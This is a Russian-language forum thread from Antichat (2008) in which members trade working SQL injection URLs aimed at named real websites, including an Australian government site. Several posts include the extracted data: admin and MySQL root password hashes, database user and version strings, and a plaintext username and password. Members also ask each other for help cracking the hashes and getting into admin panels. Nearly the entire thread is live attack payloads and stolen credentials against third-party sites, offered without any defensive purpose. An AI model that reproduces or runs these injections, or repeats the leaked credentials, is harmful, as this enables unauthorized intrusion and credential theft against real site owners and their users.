HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.01.2008, 04:20
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

http://techgaz.ru/
Цитата:
http://techgaz.ru/product.php?id=-1+union+select+concat_ws(0x3a,login,password,versi on()),2,3,4+from+utg_admin/*
techgaz : *2B5D01B5C8ECF867C58B966856AD111E4589B102 : 4.1.18-log

http://www.fotoinfo.net/
Цитата:
http://www.fotoinfo.net/speciale/detail.php?ID=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23/*
Наугад таблицы подгонял ,чёт не получилось, если у кого получится отпишите ради интереса

Последний раз редактировалось ILYAtirtir; 06.01.2008 в 04:25..
 
Ответить с цитированием

  #2  
Старый 06.01.2008, 07:40
netpingx
Новичок
Регистрация: 13.12.2007
Сообщений: 2
Провел на форуме:
2667

Репутация: 10
По умолчанию

http://www.mysql-hispano.org/page.php?id=3+UNION+SELECT+1,2,3,4,5+from+hispano. users/*
 
Ответить с цитированием

  #3  
Старый 06.01.2008, 07:54
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.buggenhout.be/

Код:
http://www.buggenhout.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
http://www.brecht.be/

Код:
http://www.brecht.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
 
Ответить с цитированием

http://www.dynamomania.com
  #4  
Старый 06.01.2008, 15:47
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию http://www.dynamomania.com

http://www.dynamomania.com

http://www.dynamomania.com/news.php?p=message&id=-31370+union+select+1,2,3,concat_ws(char(58),name,p wd,email),5,6+from+users/*

Дальше через limit

Это пароли от форума!!!

Пароли для админки не подходят=(
Если кто-нибудь найдет пароли для админки- отпишитесь пожалуйста))

Последний раз редактировалось Tigger; 06.01.2008 в 15:57..
 
Ответить с цитированием

http://www.greenshift.com/
  #5  
Старый 06.01.2008, 15:48
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию http://www.greenshift.com/

http://www.greenshift.com/

http://www.greenshift.com/news.php?id=-97+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12+from+mysql.user/*

root:*3AE51E09E8B6540D267826C97259B607120DB332

Помагите расшифровать))

Последний раз редактировалось Tigger; 06.01.2008 в 16:18..
 
Ответить с цитированием

  #6  
Старый 06.01.2008, 16:25
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

http://www.milim.com/news.php?id=-100+union+select+1,2,3,4,5,6,7,8/*

Таблицы подобрать не смог((
 
Ответить с цитированием

  #7  
Старый 06.01.2008, 16:35
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

http://www.welsh-premier.com/news.php?ID=-6121+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+ mysql.users/*
Говорит, что нехватает прав для просмотра
Это наверно можно как-то избежать
Не пинайте ногами)) Я новичок))
 
Ответить с цитированием

  #8  
Старый 06.01.2008, 16:56
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

http://www.eqvitec.com/news.php?id=2&vuosi=2002&uutinen=-24+union+select+1,2,3,4,5,6,7,8+from+admin/*

Подобрал только таблицу...колонки найти не смог((
 
Ответить с цитированием

  #9  
Старый 06.01.2008, 17:13
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
По умолчанию

chicken.org.au

Код HTML:
http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9,10,11,12/*
USER:vs28054_1_dbo@wic023u.server-web.com
VERSION:4.0.24-nt-max-log
DATABASE:vs28054_1

Код HTML:
http://www.chicken.org.au/page.php?id=-4+union+select+0,1,2,3,4,concat(id,0x3a,login,0x3a,password),6,7,8,9,10,11,12+from+users/*
Таблица - users
Поля - id,login,password

13:Sarah:sanchez
 
Ответить с цитированием

  #10  
Старый 06.01.2008, 17:18
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
По умолчанию

Правительство Австралии xD. Au
Цитата:
http://www.gg.gov.au/governorgeneral/content.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION (),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.